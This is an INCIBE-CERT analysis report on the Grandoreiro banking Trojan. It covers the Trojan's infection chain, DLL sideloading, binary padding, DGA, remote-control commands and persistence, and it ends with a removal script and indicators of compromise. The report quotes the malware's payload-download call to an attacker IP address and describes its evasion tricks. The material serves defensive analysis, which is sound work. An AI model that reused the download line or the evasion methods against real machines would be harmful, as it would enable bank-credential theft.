## Grandoreiro analysis study ----- **_June 2022_** **INCIBE-CERT_STUDY_GRANDOREIRO_ANALYSIS_2022_v1** This publication belongs to INCIBE (Spanish National Cybersecurity Institute) and is licensed under a Creative Commons Attribution-Non-commercial 3.0 Spain License. For this reason, it is permitted to copy, distribute and communicate this work publicly under the following conditions: - Acknowledgement. The content of this report may be reproduced in part or in full by third parties, with the appropriate acknowledgement and making express reference to INCIBE or INCIBE-CERT and its website: [https://www.incibe.es/. Under no](https://www.incibe.es/) circumstances shall said acknowledgement imply that INCIBE supports said third party or supports the use they make of this work. - Non-commercial Use. The original material and the derived works may be distributed, copied and exhibited provided their use does not have a commercial purpose. By reusing or distributing the work, the terms of the license of this work must be made clear. Some of these conditions may not apply if permission is obtained from INCIBE-CERT as owner of the authorship rights. Full text of the license: [https://creativecommons.org/licenses/by-nc-sa/3.0/es/.](https://creativecommons.org/licenses/by-nc-sa/3.0/es/) ----- # Index ###### INDEX OF GRAPHICS .......................................................................................... 3 INDEX OF TABLES ............................................................................................... 4 1. About this study ............................................................................................... 5 2. Document structure ......................................................................................... 6 3. Introduction ...................................................................................................... 7 4. Technical report ............................................................................................... 8 4.1. Infection methods ......................................................................................... 8 4.2. Programming language, functions and mode of operation ........................... 8 4.3. Protection methods used by the Trojan ...................................................... 26 5. Detection and disinfection ............................................................................. 28 5.1. Detection and disinfection methods ........................................................... 28 5.2. Recommendations ..................................................................................... 28 6. References ...................................................................................................... 29 Appendix 1: Indicators of compromise (IOC) .................................................. 31 Appendix 2: Yara Rules of detection ............................................................... 33 #### INDEX OF GRAPHICS Figure 1: Process of infection with the Grandoreiro banking Trojan .................................................. 8 Figure 2: dll downloader compiled with Borland Delphi 7 .................................................................. 9 Figure 3: Trojan dll compiled with Borland Delphi 7 ........................................................................... 9 Figure 4: Sample source of analysis .................................................................................................. 9 Figure 5: Final Trojan download URL............................................................................................... 10 Figure 6: User language check ........................................................................................................ 10 Figure 7: Server hosting the payload ............................................................................................... 11 Figure 8: Simulation of the infection process ................................................................................... 11 Figure 9: Directory with several files ................................................................................................ 12 Figure 10: Window of solodriver.exe when the dll is not in execution.............................................. 12 Figure 11: Applications in the Trojan's execution directory .............................................................. 13 Figure 12: ISO images inside that make the file larger than usual .................................................. 13 Figure 13: Comparing the main language with the Portuguese language ....................................... 14 Figure 14: Comparing the main language with the Spanish language ............................................ 14 Figure 15: Examples of use of the RTC Portal component .............................................................. 15 Figure 16: Finding the solodriver.exe window in order to hide it ...................................................... 15 Figure 17: Looking for the window to hide it ..................................................................................... 16 Figure 18: Searched windows linked to Spanish banks ................................................................... 16 Figure 19: Searched windows linked to Portuguese banks ............................................................. 16 Figure 20: Decryption of chain in order to be used .......................................................................... 17 Figure 21: String decryption algorithm ............................................................................................. 17 Figure 22: String to be decrypted and the key it uses ...................................................................... 17 Figure 23: Example of some of the words related to the banks intended to be supplanted ............ 18 Figure 24: Cleaning DNS cache before generating dynamic domains ............................................ 18 Figure 25: DGA generation zone...................................................................................................... 19 Figure 26: The process of generating dynamic domains ................................................................. 19 Figure 27: Starting to collect data from the affected equipment ...................................................... 19 Figure 28: Process of obtaining the name of the PC ....................................................................... 19 ----- Figure 29: Data collected in order to be sent ................................................................................... 20 Figure 30: Use of the RTC HTTP component for communication with Command and Control ...... 20 Figure 31: DLL update ...................................................................................................................... 21 Figure 32: Command to disconnect the victim ................................................................................. 21 Figure 33: Machine reboot process .................................................................................................. 21 Figure 34: Trojan reset command sending area .............................................................................. 22 Figure 35: Cursor information query................................................................................................. 22 Figure 36: Command to control the cursor ....................................................................................... 22 Figure 37: Create UPAK.BIN file ...................................................................................................... 22 Figure 38: Creating the log to record the activity ............................................................................. 23 Figure 39: Delete the log file ............................................................................................................ 23 Figure 40: Searches in-memory processes ..................................................................................... 23 Figure 41: Preparing data to be sent ................................................................................................ 24 Figure 42: Disable scrolling .............................................................................................................. 24 Figure 43: Self-deletion .................................................................................................................... 25 Figure 44: Examples of network encrypted files .............................................................................. 25 Figure 45: Registration key name .................................................................................................... 25 Figure 46: Register key writing zone to ensure persistence ............................................................ 26 Figure 47: Software searching the infected equipment .................................................................... 26 Figure 48: Debug check with IsDebuggerPresent............................................................................ 26 #### INDEX OF TABLES Table 1. .bat script intended to delete the Trojan and its components ............................................ 28 Table 2. Financial institutions affected by Grandoreiro .................................................................... 32 ----- ### 1. About this study This study sets forth the results of the analysis conducted on the Grandoreiro banking Trojan, also known as Delephant. As a trojan, this malware is designed to have multiple uses, the most common of which is to create a backdoor on the infected equipment to be able to download updates and new functions. The aim of the study is to gather the necessary information to identify the characteristics of this threat as well as its behaviour and techniques used, allowing traceability of future versions of the same malware, or its potential impact on other entities in the financial sector, or even in other sectors. In addition, there is evidence of the spread of operations conducted with this malware to Europe, including Spain and Portugal, and it has been active in Latin America since 2015. The actions carried out for its preparation comprise an analysis within a controlled environment. The general information obtained is that Grandoreiro is a Trojan developed in Delphi, a programming language popular for Brazilian malware. It is distributed via phishing, that is, e-mail campaigns that send malicious attachments or links that redirect to fraudulent web pages alerting the user to install fake Java or Flash application updates. Once its low-level modus operandi has been described, a series of countermeasures are provided to detect this Trojan and, if necessary, to disinfect the affected computer. ----- ### 2. Document structure This document comprises a 3.- Introduction part presenting the type of threat that the Grandoreiro Trojan represents, and mentions its main purpose and some of its characteristics Subsequently, a 4.-Technical report part provides detailed information on the infection routes used by this Trojan, the language in which it is programmed, its functionalities and mode of action, describing the infection process step by step, as well as the protection methods used by Grandoreiro to evade security controls. Subsequently, recommendations and actions to detect the Grandoreiro threat, as well as the cleaning process, are provided in section 5.- Detection and disinfection . Finally, section 6.- References lists the references consulted throughout the analysis. In addition, the document has two annexes: Appendix 1: Indicators of compromise (IOC) includes the indicator of commitment (IOC) associated to Grandoreiro and Appendix 2: Yara Rules of detection comprises the Yara rules for the detection malicious samples of this Trojan. ----- ### 3. Introduction Grandoreiro, is one of the many banking Trojans originating in South America that has spread its operations to other regions, mainly to Europe. According to ESET researchers, it has been active since 2015, affecting Latin American countries, mainly Brazil, its country of origin. According to researchers, Grandoreiro authors update its code at a remarkable speed, and even suspect that two variants exist simultaneously, and in 2019 expanded worldwide to banks in Spain, Mexico and Portugal, as well as adjusting the themes of its distribution campaigns by taking advantage of the disinformation campaigns and hoaxes surrounding COVID-19 at the height of the pandemic, especially during 2020. ----- ### 4. Technical report ##### 4.1. Infection methods The most common method of Trojan infection consists of several stages; fist, the target user receives an e-mail which contains a URL pointing to a fraudulent page. By clicking on the link included in the fraudulent email received, the user unknowingly downloads the first element of the process. This is an installer file which, in turn, will download the payload containing the banking Trojan. However, occasionally this file may be included in the e-mail as an attachment. **_Figure 1: Process of infection with the Grandoreiro banking Trojan_** ##### 4.2. Programming language, functions and mode of operation **_Grandoreiro in a banking Trojan whose name was inspired by the_** [large volume of binaries](https://www.welivesecurity.com/la-es/2020/04/28/grandoreiro-troyano-bancario-dirigido-brasil-espana-mexico-peru/) [generated by the attackers, which exceeded 250 MB. This made it difficult its analysis on](https://www.welivesecurity.com/la-es/2020/04/28/grandoreiro-troyano-bancario-dirigido-brasil-espana-mexico-peru/) the different online sandboxes platforms, as it exceeded the allowed limit by far. Several binaries are involved in user engagement. It starts from the initial binary that is downloaded by the victim. This binary is a compressed file containing an installer. It contains (msi extension) is the dll **_(sha256sum:_** **_58084c86acd68c83d84802ef8daa9cdfefdcf34d7fa1b9a0e04c4ca124e58382) that acts_** as a **downloader (malware that downloads the threat from the Internet to the victim's** computer). This binary is programmed in Delphi and compiled with Borland Delphi 7. ----- **_Figure 2: dll downloader compiled with Borland Delphi 7_** The second dll (sha256sum: **_35c0744bec0e123d24a9ffd3d7a9edeb07d9341ab45619b5fc881ce7dd81276a) and_** which will be discussed later in the study, belongs to the Grandoreiro banking Trojan family. As above, programmed in Delphi and compiled with Borland Delphi 7. **_Figure 3: Trojan dll compiled with Borland Delphi 7_** **_Figure 4: Sample source of analysis_** It is a compressed file. Inside there is an installer (msi), which will download the payload containing the banking Trojan. In the embedded dll, you can see where the URL is located and where the payload can be found; this payload is encrypted so as not to be detected from the start by analysis tools. ----- **_Figure 5: Final Trojan download URL_** Fist, the user language is verified, and users having set up English as their language are rejected; if such a user is detected, the process ended. In this way, they ensure that the target user matches their intended target, and would prevent it from being executed as usual on any sandbox platform whose language is English. **_Figure 6: User language check_** Once you have the URL in the correct format, removing filler characters, download the file shown below. ----- **_Figure 7: Server hosting the payload_** The dll downloads and completes the code so that it can be decompressed later in the expected path. The attackers make sure that the server registers the user's language, as it is intended for Spanish users. They add the language to the URL and use the _URLDownloadToFile API function:_ ``` URLDownloadToFile(http://149.56.251.1:51551/esgrime.zip?Español (Spanish, international), C:\Users\\AppData\Roaming\nowview\AX3346546774.zip) ``` This file will be stored under path _C:\Users>AppData\Roaming\nownowview\AX3346546774.zip._ **_Figure 8: Simulation of the infection process_** After several mathematical operations based on XOR, a zip file is generated in which it can be unzipped, leaving the dll placed next to the executable (and 2 other dll that the executable needs), which will be in charge of launching the infection process. The contents of the downloaded file are decrypted and then decompressed, and a series of files are placed in the directory. ----- **_Figure 9: Directory with several files_** The malicious dll is dbghelp.dll, which, since it is located in the same directory, will be loaded as a regular dll by the solodriver.exe executable; this is the first place where it will be looked for, ignoring the legitimate one in the system. The application solodriver.exe is part of the Advanced Installer 18.6.1 software and is called _intune.exe._ Therefore, they use a legitimate application to load the malicious dll which controls that the main application window remains hidden and is not visible, although at the moment of execution it is briefly displayed before it is hidden again. If the malicious dll is removed from the same directory where _solodriver.exe is located is_ executed, we can see what it really looks like and identify that this file hides the Trojan controlling the displayed windows. **_Figure 10: Window of solodriver.exe when the dll is not in execution_** ----- Apparently, any action triggered by the dll will appear to be performed by _solodriver.exe,_ since it is in the memory of the executable as just another dll. **_Figure 11: Applications in the Trojan's execution directory_** The dynamic library _dbghelp.dll is a sizeable (255M) library, which makes it difficult to_ analyse it with certain applications, as often those are limited to smaller binaries, as is the case with many online malware analysis platforms. Opening the file with a resource editor reveals why it is so large: it contains 2 ISO-type similar images. **_Figure 12: ISO images inside that make the file larger than usual_** The first, MBJDJDBHWDX.bmp, takes 128 MB while the second, ZCCFMYWMGGO.bmp, weighs 118 MB. ----- As the campaign is aimed at users in Spain and Portugal, it seeks to ensure that the language configuration is country-specific. **_Figure 13: Comparing the main language with the Portuguese language_** **_Figure 14: Comparing the main language with the Spanish language_** Figure 15 makes use of the RTC Portal component. This component is specially designed for remote desktop control, file sharing and chat applications. As its own website [states,](https://rtc.teppi.net/details/) RealThinClient SDK is a flexible and modular framework for building reliable and scalable cross-platform Applications with Delphi, designed for the Web by utilizing HTTP/S with full IPv4 & IPv6 support and built-in multi-threading, extensively stress-tested to ensure the highest stability. By using non-blocking event-driven communication with built-in threadpooling, applications built with the RealThinClient SDK can handle thousands of active connections by using a limited number of threads in a real multi-threaded environment, on all supported platforms.” ----- **_Figure 15: Examples of use of the RTC Portal component_** When the application is started, a series of timers are created. Those timers will periodically check what is going on in the computer, as well as hide the application used to load the dll. **_Figure 16: Finding the solodriver.exe window in order to hide it_** First, it uses _FindWindowA API to search for the window with the title "Visual Studio_ Ultimate" and if found, use its handle to hide it with ShowWindow. ----- **_Figure 17: Looking for the window to hide it_** Another periodic process is to check that banks are accessed, looking for a series of strings in the active windows. **_Figure 18: Searched windows linked to Spanish banks_** **_Figure 19: Searched windows linked to Portuguese banks_** ----- Not all strings are directly accessible in the binary, but when needed, they are decrypted following an XOR-based algorithm. This takes into account the encrypted string with a key. The method consists on running through the string and performing character-by-character operations taking into account its current position and the previous position in between. **_Figure 20: Decryption of chain in order to be used_** **_Figure 21: String decryption algorithm_** **_Figure 22: String to be decrypted and the key it uses_** ----- **_Figure 23: Example of some of the words related to the banks intended to be supplanted_** If any of them are found during the running processes, it prepares to generated the dynamic domains that will be queried. Before, it runs the command "ipconfig /flushdns" to clear the DNS cache. **_Figure 24: Cleaning DNS cache before generating dynamic domains_** Then, using a base of 11 predefined domains, it generates the final dynamic domains according to the Domain Generator Algorithm (DGA), as shown at Figure 25. ----- **_Figure 25: DGA generation zone_** Therefore, 80 different dynamic domains are generated in this way. **_Figure 26: The process of generating dynamic domains_** Once the process is finished, it gets the name of the PC and decrypts one of the strings it needs to report to Command and Control. These strings are encrypted within the binary. **_Figure 27: Starting to collect data from the affected equipment_** Each country has an associated identifier (7236), and when it detects that one of them is being visited, it associates it to this corresponding value in order to report this. **_Figure 28: Process of obtaining the name of the PC_** ----- An example of the data to be sent is presented at Figure 29 . The name of the affected equipment has been obfuscated. **_Figure 29: Data collected in order to be sent_** This communication is done with the above-mentioned RTC component. **_Figure 30: Use of the RTC HTTP component for communication with Command and Control_** Other main functionalities of this Trojan include the following:  It has the ability to update the malicious dll. For this purpose, the word _UpdateDLLMODULO is used._ This process would download a zip file with the same name as the dll, unzip it and halt the process to resume it later. In order to do this, a bat file called cookie.bat is created and added to the actions mentioned above. ----- **_Figure 31: DLL update_**  It has the ability to disconnect the victim using the code SUSPENDEACESSO, to reboot the machine using the code REINICIAGERAL, or to reboot the Trojan itself using the code Rein1c1aSystem. **_Figure 32: Command to disconnect the victim_** **_Figure 33: Machine reboot process_** ----- **_Figure 34: Trojan reset command sending area_**  It has the capability to obtain information on cursor use (code EXIBIRMZ). **_Figure 35: Cursor information query_**  And to control the user's cursor (code OCULTARMZ). **_Figure 36: Command to control the cursor_**  It can create a registry file, called UPAK.BIN, using the code CRIARCADASTRO. **_Figure 37: Create UPAK.BIN file_**  It has the ability to create an activity log in a log called _lz.log, using the code_ _MARCARPC._ ----- **_Figure 38: Creating the log to record the activity_**  It can use the code DEL3TARMARC0AO to delete the file lz.log, as a log mentioned above, in the same path as the executable. **_Figure 39: Delete the log file_**  It has the capacity to search the processes in memory using the code _DETONATEPROCESS._ **_Figure 40: Searches in-memory processes_**  It has the ability to take screenshots, using the codes _ATIVARCAPTURAMAG and_ _ATIVARCAPTURAFULL. The difference the method used to perform this action: if the_ ----- operating systems are Windows 10, 8.1 and Server, then it uses of the _MAG_ _"Magnification" DLL, otherwise it uses the FULL option._ **_Figure 41: Preparing data to be sent_**  It can deactivate the scroll bar using the code DISABLESCROOL. **_Figure 42: Disable scrolling_**  It deletes both the entire directory where the Trojan is located using the DELETEAKL code, and the registry key, as if it had never existed. ----- **_Figure 43: Self-deletion_** It is therefore possible to tamper with windows that have been opened by the user, to capture the user’s keystrokes and to simulate keyboard and mouse actions. At the same time, it can control the user's browsing or blocking access to websites chosen by the attacker. **Persistence** is ensured by creating a shortcut to it in the registry key _HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Uvnerjnx (this key may vary_ from case to case), pointing to _C:\User\appdata\roaming\nownowviewview\solodriver.exe_ (as the executable name and path may be different in other samples). **_Figure 44: Examples of network encrypted files_** **_Figure 45: Registration key name_** ----- **_Figure 46: Register key writing zone to ensure persistence_** Thus, every time the computer is rebooted, the Trojan will be executed and will be able to continue collecting and using any information it may need to communicate with the C&C. ##### 4.3. Protection methods used by the Trojan The Trojan tries to protect itself from anti-malware software most widely used in Latin America, such as IBM Trusteer and Warsaw Diebold. **_Figure 47: Software searching the infected equipment_** A standard measure that many Trojans use is to verify whether they are being debugged, thanks to the Windows IsDebuggerPresent API. **_Figure 48: Debug check with IsDebuggerPresent_** Grandoreiro's technique for obfuscating malicious binaries in order to go undetected, which tries to make binaries so large that malware analysis platforms are unable to detect it due to their delivery size limitations, is known as binary padding. It is filled with large images for no other purpose than to make the binary such a size that makes it difficult to analyse. ----- The use of legitimate and signed applications loading the dll with a legitimate and existing name in the operating system, but in the same directory as the executable (first in the dll loading path), which causes it to load earlier than expected, makes detection more difficult. ----- ### 5. Detection and disinfection ##### 5.1. Detection and disinfection methods Many anti-virus software programmes are capable of detecting this threat, so it would be advisable to have anti-virus software and anti-spam tools installed and updated. In cases where the first touchpoint is a Microsoft Office document, disable the macro automatic execution function, and, above all, be wary of any unknown senders and do not install files from unreliable sources under any circumstances. For disinfection, it is necessary to delete the registry key associated with persistence. In the analysed sample the registration key is _Uvnerjnx. However, it can be different in other_ cases. In addition to interrupting the executable that uses the dll, in order to ensure that the action does not fail due to the fact that the executable was still running and the Trojan dll was active. Therefore, the following script is valid when the registry key, the path and the name of the executable match. In other cases, these values must be changed to ensure that they match. ``` Key=”Uvnerjnx” Executable=”solodriver.exe” Path=”nowview” reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v %Clave% /f taskkill /f /im %Executable% del /F %APPDATA%\%Path%\*.exe del /F %APPDATA%\%Path%\*.dll rmdir /s /q %APPDATA%\%Path% ``` **_Table 1. .bat script intended to delete the Trojan and its components_** ##### 5.2. Recommendations In order to avoid getting infected with the Grandoreiro malware, it is advisable to apply the following measures:  Ignore irrelevant emails and emails that are sent from an unknown address or include an attachment (or a link to a website) and never open files or web links included in such these emails before ensuring that it is perfectly safe to do so.  Only download software from official websites and via direct download links.  Update installed programs through implemented functions or tools provided by official software developers. The same applies to activating software.  Regularly scan the operating system for threats with a trustworthy anti-virus or anti spyware suite and ensure that this software is kept updated. ----- ### 6. References  Alberto Payo “El troyano bancario brasileño Grandoreiro vuelve a amenazar a los usuarios españoles” [https://www.escudodigital.com/ciberseguridad/troyano-bancario-](https://www.escudodigital.com/ciberseguridad/troyano-bancario-brasileno-grandoreiro-vuelve_50335_102.html) [brasileno-grandoreiro-vuelve_50335_102.html](https://www.escudodigital.com/ciberseguridad/troyano-bancario-brasileno-grandoreiro-vuelve_50335_102.html) (Dec 06, 2021) Last accessed: Feb. 03, 2022.  Aitor Echavarri “Campaña Grandoreiro Mercadona” [https://botechfpi.com/campana-](https://botechfpi.com/campana-grandoreiro-mercadona) [grandoreiro-mercadona (Aug. 19, 2020) Last accessed: Feb. 03, 2022.](https://botechfpi.com/campana-grandoreiro-mercadona)  Grandoreiro-Bcsc-Malware-Grandoreiro [https://www.basquecybersecurity.eus/archivos/202104/bcsc-malware-grandoreiro-](https://www.basquecybersecurity.eus/archivos/202104/bcsc-malware-grandoreiro-tlpwhite_v2.pdf) [tlpwhite_v2.pdf Last accessed: Feb. 08, 2022.](https://www.basquecybersecurity.eus/archivos/202104/bcsc-malware-grandoreiro-tlpwhite_v2.pdf)  Check Point and Europol "Banking Trojans: From Stone Age to Space Era ["](https://www.europol.europa.eu/cms/sites/default/files/documents/banking_trojans_from_stone_age_to_space_era.pdf) [https://www.europol.europa.eu/cms/sites/default/files/documents/banking_trojans_fro](https://www.europol.europa.eu/cms/sites/default/files/documents/banking_trojans_from_stone_age_to_space_era.pdf) [m_stone_age_to_space_era.pdf (March 21, 2017) Last accessed: Feb. 04, 2022.](https://www.europol.europa.eu/cms/sites/default/files/documents/banking_trojans_from_stone_age_to_space_era.pdf)  Cytomic “Vuelve el troyano Grandoreiro contra las entidades bancarias aprovechando el COVID-19” [https://www.cytomic.ai/es/alertas/troyano-grandoreiro-ataque-banca/](https://www.cytomic.ai/es/alertas/troyano-grandoreiro-ataque-banca/) (May 20, 2019) Last accessed: Feb. 14, 2022.  Cybersecurityadmin" Grandoreiro: How engorged can an EXE get?" https://nofalsepositives.com/grandoreiro-how-engorged-can-an-exe-get (Jan. 08, 2022) Last accessed: Feb. 04, 2022.  Dani Abramov and Limor Kessem "Grandoreiro Malware Now Targeting Banks in Spain" Security Intelligence [https://securityintelligence.com/posts/grandoreiro-malware-now-](https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/) [targeting-banks-in-spain/ (Apr. 13, 2020) Last accessed: Feb. 02, 2022.](https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/)  David Garcia “El troyano bancario Faketoken ha vuelto: analizamos su funcionamiento” Revelock. [https://www.revelock.com/es/blog/el-troyano-faketoken-ha-vuelto-](https://www.revelock.com/es/blog/el-troyano-faketoken-ha-vuelto-analizamos-su-funcionamiento) [analizamos-su-funcionamiento (Feb. 17, 2020) Last accessed: Feb. 03, 2022.](https://www.revelock.com/es/blog/el-troyano-faketoken-ha-vuelto-analizamos-su-funcionamiento)  David Garcia “Fraude basado en inyecciones de código y phishing” [https://www.revelock.com/es/blog/grandoreiro-un-malware-con-una-estrategia-de-](https://www.revelock.com/es/blog/grandoreiro-un-malware-con-una-estrategia-de-fraude-basada-en-inyecciones-de-codigo-y-phishing-para-interceptar-credenciales) [fraude-basada-en-inyecciones-de-codigo-y-phishing-para-interceptar-credenciales](https://www.revelock.com/es/blog/grandoreiro-un-malware-con-una-estrategia-de-fraude-basada-en-inyecciones-de-codigo-y-phishing-para-interceptar-credenciales) (Jan. 02, 2021) Last accessed: Feb. 02, 2022.  Ehacking “Phishing que invita a descargar copia de seguridad de WhatsApp descarga el troyano Grandoreiro”. Ethical Hacking Consultants [https://blog.ehcgroup.io/2021/10/12/14/00/14/11933/phishing-que-invita-a-descargar-](https://blog.ehcgroup.io/2021/10/12/14/00/14/11933/phishing-que-invita-a-descargar-copia-de-seguridad-de-whatsapp-descarga-el-troyano-grandoreiro/seguridad-informatica/troyanos/ehacking/) [copia-de-seguridad-de-whatsapp-descarga-el-troyano-grandoreiro/seguridad-](https://blog.ehcgroup.io/2021/10/12/14/00/14/11933/phishing-que-invita-a-descargar-copia-de-seguridad-de-whatsapp-descarga-el-troyano-grandoreiro/seguridad-informatica/troyanos/ehacking/) [informatica/troyanos/ehacking/ (Oct. 12, 2021). Last accessed: Feb. 04, 2022.](https://blog.ehcgroup.io/2021/10/12/14/00/14/11933/phishing-que-invita-a-descargar-copia-de-seguridad-de-whatsapp-descarga-el-troyano-grandoreiro/seguridad-informatica/troyanos/ehacking/)  ESET Research “Grandoreiro: análisis de un troyano bancario dirigido a Brasil, España, México y Perú” [https://www.welivesecurity.com/la-es/2020/04/28/grandoreiro-troyano-](https://www.welivesecurity.com/la-es/2020/04/28/grandoreiro-troyano-bancario-dirigido-brasil-espana-mexico-peru/) [bancario-dirigido-brasil-espana-mexico-peru/](https://www.welivesecurity.com/la-es/2020/04/28/grandoreiro-troyano-bancario-dirigido-brasil-espana-mexico-peru/) (Apr. 28, 2020). Last accessed: Feb. 04, 2022.  ESET Research “Desde Amavaldo a Zumanek: un análisis de 12 troyanos bancarios de América Latina” [https://www.welivesecurity.com/la-es/2021/12/15/analisis-12-](https://www.welivesecurity.com/la-es/2021/12/15/analisis-12-troyanos-bancarios-america-latina/) [troyanos-bancarios-america-latina/](https://www.welivesecurity.com/la-es/2021/12/15/analisis-12-troyanos-bancarios-america-latina/) (Dec. 15, 2021) Last accessed: Feb. 02, 2022.  ESET Research “Indicadores muestran la cooperación entre autores de troyanos bancarios de América Latina” [https://www.welivesecurity.com/la-](https://www.welivesecurity.com/la-es/2020/10/01/indicadores-muestran-cooperacion-entre-autores-troyanos-bancarios-america-latina/) [es/2020/10/01/indicadores-muestran-cooperacion-entre-autores-troyanos-bancarios-](https://www.welivesecurity.com/la-es/2020/10/01/indicadores-muestran-cooperacion-entre-autores-troyanos-bancarios-america-latina/) [america-latina/ (Oct. 1, 2020) Last accessed: Feb. 04, 2022.](https://www.welivesecurity.com/la-es/2020/10/01/indicadores-muestran-cooperacion-entre-autores-troyanos-bancarios-america-latina/) -----  INCIBE “Estudio del análisis de FluBot” [https://www.incibe-](https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_flubot_2021_v1.pdf%20/) [cert.es/sites/default/files/contenidos/estudios/doc/incibe-](https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_flubot_2021_v1.pdf%20/) [cert_estudio_analisis_flubot_2021_v1.pdf /](https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_flubot_2021_v1.pdf%20/) (May, 2021) Last accessed: Feb. 15, 2022.  Infobae “México, Brasil y España, los países más afectados por ataques cibernéticos bancarios” [https://www.infobae.com/america/tecno/2021/12/17/mexico-brasil-y-](https://www.infobae.com/america/tecno/2021/12/17/mexico-brasil-y-espana-los-paises-mas-afectados-por-ataques-ciberneticos-bancarios/) [espana-los-paises-mas-afectados-por-ataques-ciberneticos-bancarios/ (Dec. 17, 2021)](https://www.infobae.com/america/tecno/2021/12/17/mexico-brasil-y-espana-los-paises-mas-afectados-por-ataques-ciberneticos-bancarios/) Last accessed: Feb. 01, 2022.  IT News “ESET amplía la investigación sobre el troyano bancario Grandoreiro” [https://itnews.lat/eset-ampl-a-la-investigaci-n-sobre-el-troyano-bancario-](https://itnews.lat/eset-ampl-a-la-investigaci-n-sobre-el-troyano-bancario-grandoreiro.html) [grandoreiro.html (Apr. 28, 2021) Last accessed: Feb. 04, 2022.](https://itnews.lat/eset-ampl-a-la-investigaci-n-sobre-el-troyano-bancario-grandoreiro.html)  José Manuel Roviralta Puente “Ataques de inyección SQL, una amenaza para tu web” [https://www.incibe.es/protege-tu-empresa/blog/ataques-inyeccion-sql-amenaza-tu-](https://www.incibe.es/protege-tu-empresa/blog/ataques-inyeccion-sql-amenaza-tu-web) [web](https://www.incibe.es/protege-tu-empresa/blog/ataques-inyeccion-sql-amenaza-tu-web) INCIBE (Oct 26, 2021) Last accessed: Feb. 6, 2022  Kaspersky Lab "The Tetrade: Brazilian banking malware goes global ["](https://securelist.com/the-tetrade-brazilian-banking-malware/97779/) [https://securelist.com/the-tetrade-brazilian-banking-malware/97779/ (July. 14, 2020)](https://securelist.com/the-tetrade-brazilian-banking-malware/97779/) Last accessed: Feb. 02, 2022.  Open Web Application Security Project "Man-in-the-browser attack ["https://owasp.org/www-community/attacks/Man-in-the-browser_attack](https://owasp.org/www-community/attacks/Man-in-the-browser_attack) Date last accessed: Feb. 03, 2022.  OSI “Copia de seguridad de mensajes de WhatsApp” nuevo correo electrónico fraudulento que descarga malware [https://www.osi.es/es/actualidad/avisos/2021/09/copia-de-seguridad-de-mensajes-de-](https://www.osi.es/es/actualidad/avisos/2021/09/copia-de-seguridad-de-mensajes-de-whatsapp-nuevo-correo-electronico) [whatsapp-nuevo-correo-electronico](https://www.osi.es/es/actualidad/avisos/2021/09/copia-de-seguridad-de-mensajes-de-whatsapp-nuevo-correo-electronico) (Sept. 22, 2021) Last accessed: Feb. 03, 2022.  Pedro Tavares "The updated Grandoreiro Malware equipped with latenbot-C2 features [in Q2 2020 now extended to Portuguese banks " https://seguranca-informatica.pt/the-](https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks/#.YgPmDoTMIdU) [updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-](https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks/#.YgPmDoTMIdU) [extended-to-portuguese-banks/#.YgPmDoTMIdU](https://seguranca-informatica.pt/the-updated-grandoreiro-malware-equipped-with-latenbot-c2-features-in-q2-2020-now-extended-to-portuguese-banks/#.YgPmDoTMIdU) (May 26, 2020) Last accessed: Feb. 08, 2022.  Pierluigi Paganini "Grandoreiro Malware implements new features in Q2 2020 ["](https://securityaffairs.co/wordpress/103853/malware/grandoreiro-malware-q2-2020.html) [https://securityaffairs.co/wordpress/103853/malware/grandoreiro-malware-q2-](https://securityaffairs.co/wordpress/103853/malware/grandoreiro-malware-q2-2020.html) [2020.html (May 27, 2020) Last accessed: Feb. 03, 2022.](https://securityaffairs.co/wordpress/103853/malware/grandoreiro-malware-q2-2020.html)  Techbit “Grandoreiro: el virus troyano bancario que amenaza a México” El Universal [https://www.eluniversal.com.mx/techbit/grandoreiro-el-virus-troyano-bancario-que-](https://www.eluniversal.com.mx/techbit/grandoreiro-el-virus-troyano-bancario-que-amenaza-mexico/video/ciencia-y-salud/desinfectantes-caseros-estoy-sanitizando-bien-mi-hogar) [amenaza-mexico/video/ciencia-y-salud/desinfectantes-caseros-estoy-sanitizando-](https://www.eluniversal.com.mx/techbit/grandoreiro-el-virus-troyano-bancario-que-amenaza-mexico/video/ciencia-y-salud/desinfectantes-caseros-estoy-sanitizando-bien-mi-hogar) [bien-mi-hogar (May 04, 2020) Last accessed: Feb. 01, 2022.](https://www.eluniversal.com.mx/techbit/grandoreiro-el-virus-troyano-bancario-que-amenaza-mexico/video/ciencia-y-salud/desinfectantes-caseros-estoy-sanitizando-bien-mi-hogar)  Satinfo “Ahora es a Carrefour a quien utilizan para conseguir que se ejecute un fichero spy Grandoreiro” [https://blog.satinfo.es/2019/ahora-es-a-carrefour-a-quien-utilizan-](https://blog.satinfo.es/2019/ahora-es-a-carrefour-a-quien-utilizan-para-conseguir-que-se-ejecute-un-fichero-spy-grandoreiro/) [para-conseguir-que-se-ejecute-un-fichero-spy-grandoreiro/ (Oct. 28, 2019) Last](https://blog.satinfo.es/2019/ahora-es-a-carrefour-a-quien-utilizan-para-conseguir-que-se-ejecute-un-fichero-spy-grandoreiro/) accessed: Feb. 02, 2022. ----- ### Appendix 1: Indicators of compromise (IOC)  **Name (Installer): Archiv.Endes.Fact3101.msi**  MD5: 6346c88c0d45779740b526dc7da79fc8  SHA256: 6a3b03e8a8a1edfcf33aebb9d55f81ed274196596a20db875e2ae923d6468bbd  **name (Downloader DLL): Binary.Maui.dll**  MD5: 20253c20ea35ec595c5577604f8a2730  SHA256: 58084c86acd68c83d84802ef8daa9cdfefdcf34d7fa1b9a0e04c4ca124e58382  **Name (Trojan DLL): dbghelp.dll**  MD5: 98ef8e5ef3bef928537d4fd25c53380a  SHA256: 35c0744bec0e123d24a9ffd3d7a9edeb07d9341ab45619b5fc881ce7dd81276a  **List of affected financial institutions** | List of affected financial|institutions|Col3| |---|---|---| |AMARELO|Liberbank|HSBCUK| |BRSUL|Openbank|barclaysUK| 